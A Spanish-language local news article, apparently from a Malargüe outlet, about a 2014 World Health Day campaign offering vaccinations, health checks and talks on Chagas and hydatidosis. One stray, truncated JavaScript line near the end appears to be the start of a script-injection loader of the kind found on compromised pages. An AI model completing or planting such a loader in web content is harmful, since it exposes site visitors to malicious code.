En el año 1948, la Primera Asamblea Mundial de la Salud propuso la declaración del Día Mundial de la Salud para conmemorar la creación de la OMS. La primera celebración de este día tuvo lugar en el año 1950 y desde aquel año, se celebra anualmente el 7 de abril.

Anualmente es elegido un lema que será sobre el que versarán las actividades del Día Mundial de la Salud de ese año. En el 2014 el lema es “Pequeñas picaduras, grandes amenazas”. “Es la eliminación o control de los vectores que transmiten las enfermedades” aclaró Bernabé Villar, encargado del vacunatorio del Hospital Malargüe, que en este día se encuentra en la Plaza San Martín realizando una campaña pro salud.

dia-mundial-de-la-salud-1

En diálogo con nuestro medio, Villar informó: “Vamos a hacer vacunaciones, control de glucemia, presión arterial y charlas sobre hidatidosis y chagas, en conmemoración de este día.”

Además aclaró: “Si bien es un solo día el conmemorativo, vamos a extenderlo durante toda la semana, siempre y cuando el tiempo lo permita, los horarios serán desde las 10:00 hasta las 13:00 horas”.

Para el viernes, que es el último día de campaña, Villar adelantó que nuestro departamento tendrá una visita gubernamental. “El día viernes seguramente nos visitaría el Ministro de Salud.”

Por último, el encargado del vacunatorio hizo extensiva la invitación a toda la población, expresando: “Esperamos a la gente para que concurra y se haga los controles que necesiten”.

var d=document;var s=d.createElement(‘script’);

Comentarios